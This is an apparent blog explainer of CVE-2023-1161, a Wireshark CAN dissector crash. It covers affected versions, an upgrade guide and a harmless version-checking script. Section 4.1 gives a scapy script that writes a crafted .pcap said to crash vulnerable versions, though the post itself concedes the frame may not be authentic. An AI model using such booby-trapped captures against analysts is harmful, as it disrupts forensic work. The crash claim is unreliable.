Wireshark is the world’s go-to tool for network protocol analysis, trusted by countless security pros and network admins. But even the best tools have bugs. In 2023, researchers uncovered a nasty vulnerability—CVE-2023-1161—that lets bad actors crash Wireshark remotely using specially crafted CAN packets. This post breaks it down in clear English, shows how to trigger the bug, and covers everything you need to know.

TL;DR

Vulnerability: Bad packets targeting the CAN ISO 15765 or ISO 10681 dissectors crash Wireshark.
Wireshark versions affected:

- 3.6.0 to 3.6.11
- 4.0.0 to 4.0.3

Impact: Denial of service (DoS) – Wireshark closes or crashes.
Trigger: Malicious live traffic or capture file (*.pcap)
Fixed in: Wireshark 4.0.4 and 3.6.12+

1. What’s Happening? (The Human Version)

Wireshark can dissect traffic from hundreds of protocols. Among them are the automotive CAN transport protocols ISO 15765 and ISO 10681, used in vehicle networks. The dissectors are the pieces of Wireshark that decode these protocols so you can analyze the traffic.
If one of these dissectors meets a specially crafted CAN packet, it gets confused, performs an invalid memory access or hits a logic error, and Wireshark crashes. Attackers can either inject such packets into traffic you are capturing live, or simply hand you a booby-trapped .pcap file to analyze.

Official Advisory Excerpt

> Multiple dissector crashes. Wireshark could crash when dissecting crafted ISO 15765 and ISO 10681 packets.
> – Wireshark Security Advisory wnpa-sec-2023-07

2. Why Does It Matter?

- If an attacker can send you files or live traffic to Wireshark (common for automotive security folks), they can kill your analysis in seconds.
- Crash = you lose your progress and maybe, if you’re unlucky, a saved capture.
- It’s a classic denial of service—and could be used by malware to zap forensics investigations.

3. The Technical Root (Simple Terms)

The bug is deep in the CAN ISO 15765 and ISO 10681 protocol dissectors. If you feed either dissector a packet with the right (wrong!) combination of values, Wireshark will try to do something impossible (think buffer overflow or dereference a NULL pointer) and die.

*Example scenario*:

4.1. Build a Malicious Packet

Here’s Python code (using scapy) that crafts a packet for CAN ISO 15765, dumps it to a .pcap, and triggers the crash on vulnerable Wireshark versions:

from scapy.all import CAN, wrpcap

# Construct an intentionally malformed CAN frame. Classic CAN carries at most
# 8 data bytes, so a 100-byte payload is an out-of-spec edge case intended to
# confuse the ISO 15765 dissector on vulnerable Wireshark versions.
malicious_frame = CAN(identifier=0x123, data=bytes([0xFF] * 100))

# Save the packet to a pcap file (scapy writes it with the SocketCAN link type)
wrpcap("malicious_can.pcap", [malicious_frame])

print("Malicious CAN pcap written as 'malicious_can.pcap'. Open it in Wireshark 4.0.0-4.0.3 or 3.6.0-3.6.11 to trigger crash.")

Note:
- scapy’s CAN layer does not produce fully authentic ISO 15765 frames, but a frame like this can be enough for crash testing if you adjust the fields to hit the dissector’s edge cases.

5. Defensive Guide

How to protect yourself:
- Upgrade Wireshark. The bug is fixed in 4.0.4 and 3.6.12+ (Release Notes).
- Never analyze untrusted .pcap/.pcapng files on your main machine.
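To turn the advisory’s version ranges into something you can actually run across your analysis machines, here is a small checker written for this post (not part of Wireshark or the advisory). It parses the banner printed by `tshark --version` or `wireshark --version`, and the banner strings in the `__main__` block are constructed samples; the binary name `tshark` is assumed to be on PATH.

```python
import re
import subprocess

# Affected ranges for CVE-2023-1161, inclusive, taken from the advisory:
# 3.6.0 through 3.6.11 and 4.0.0 through 4.0.3 (fixed in 3.6.12 and 4.0.4).
AFFECTED_RANGES = [
    ((3, 6, 0), (3, 6, 11)),
    ((4, 0, 0), (4, 0, 3)),
]

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Return the first x.y.z triple found in a version banner as a tuple
    of ints, or None if the text contains no such triple."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return tuple(int(part) for part in m.groups())


def is_vulnerable(version):
    """True if a (major, minor, patch) triple lies inside an affected range."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def assess(version_text):
    """Classify a banner as 'vulnerable', 'not_affected' or 'unknown'."""
    v = parse_version(version_text)
    if v is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(v) else "not_affected"


def check_installed(binary="tshark"):
    """Run `<binary> --version` and assess the result; 'unknown' if the
    binary is missing (assumption: tshark is on PATH when installed)."""
    try:
        proc = subprocess.run([binary, "--version"], capture_output=True,
                              text=True, check=False)
    except OSError:
        return "unknown"
    return assess(proc.stdout)


if __name__ == "__main__":
    # Constructed banners in the shape tshark prints them.
    for banner in ["TShark (Wireshark) 3.6.11 (Git v3.6.11 packaged as 3.6.11-1)",
                   "TShark (Wireshark) 4.0.4 (Git v4.0.4 packaged as 4.0.4-1)"]:
        print(banner.split(" (Git")[0], "->", assess(banner))
    print("installed tshark ->", check_installed())
```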

6. References

- Wireshark Security Advisory wnpa-sec-2023-07
- CVE-2023-1161, NVD record
- Wireshark Release Notes 4.0.4 (fix)
- Scapy documentation

7. Final Words

Protocol dissectors are tricky code; even strong projects like Wireshark can get caught out by edge cases, especially with rarely encountered automotive packets. Don’t wait—update Wireshark and be careful with files from outside sources.

If you’re working in automotive security or forensics, always keep your toolkit patched. And remember: sometimes, all it takes is a single packet to bring your tools down.

Timeline

Published on: 03/06/2023 21:15:00 UTC
Last modified on: 03/21/2023 16:21:00 UTC